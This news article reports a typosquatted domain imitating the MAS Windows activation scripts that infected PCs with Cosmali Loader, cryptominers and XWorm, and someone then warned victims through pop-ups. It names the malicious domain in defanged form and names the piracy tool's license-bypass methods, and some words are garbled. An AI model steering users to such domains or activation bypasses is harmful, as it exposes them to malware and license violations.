Users he discovered a fake domain posing as the MAS utility (Microsoft Activation Scripts) from the Massgre project. The domain was used to distribute malicious PowerShell scripts that infected Windows systems with the Cosmali Loader malware.
As Bleeping Computer reports, this week Reddit users started posting (1, 2) about strange pop-up notifications appearing on their computers. These notifications reported that the system was infected with Cosmali Loader malware and even explained the reason — a typo made while entering the Windows activation command.
“You are infected with malware called Cosmali Loader because you mistakenly typed get.activated.win as get.activate[.]win when activating Windows using PowerShell.
The malware control panel is not secure, and anyone viewing it has access to your computer.
Reinstall Windows and don’t repeat this mistake next time.
To confirm that your computer is infected, check Task Manager and look for suspicious PowerShell processes,” read the notification in one of the cases.
As discovered by a researcher known as RussianPanda, these messages are linked to the open-source malware loader Cosmali Loader. This malicious tool had previously come under the scrutiny of GDATA analyst Karsten Hahn, who also wrote about similar pop-up windows.
According to data from RussianPanda, Cosmali Loader delivered cryptominers and the XWorm remote access trojan to infected systems.
However, it is still unclear who exactly was sending the warnings to infected users. It is assumed that this may he been done by an anonymous cybersecurity researcher who somehow gained access to the malware’s C&C panel and decided to use it to notify victims of the compromise.
MAS is a well-known set of open-source PowerShell scripts that automate the activation of Windows and Office. The tool uses HWID activation, KMS emulation, and relies on Ohook and TSforge to bypass protection. The project is maintained by the Massgre team and the community, and is hosted on GitHub.
It’s worth noting that Microsoft considers MAS a pirated tool that activates products without a license using unauthorized methods. And although GitHub (which is owned by Microsoft) does not remove these tools, the company’s developers recently began cracking down on KMS-based Windows activation.
Massgre representatives he already warned users about the get.activate[.]win threat and urged everyone to double-check the commands they type before executing them.
